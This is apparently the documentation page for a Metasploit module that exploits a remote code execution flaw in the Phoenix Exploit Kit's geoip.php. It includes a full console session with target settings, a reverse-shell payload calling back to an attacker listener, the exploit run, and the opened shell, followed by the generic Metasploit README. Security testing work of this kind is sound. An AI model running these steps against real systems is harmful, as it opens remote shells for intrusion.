This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix

msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
README.md
Metasploit
The Metasploit Framework is released under a BSD-style license. See COPYING for more details.
The latest version of this software is available from: https://metasploit.com
Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework
New bugs and feature requests should be directed to: http://r-7.co/MSF-BUGv1
API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing
Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.
Using Metasploit
Metasploit can do all sorts of things. The first thing you'll want to do is start msfconsole, but after that, you'll probably be best served by reading Metasploit Unleashed, the great community resources, or the wiki.
Contributing
See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.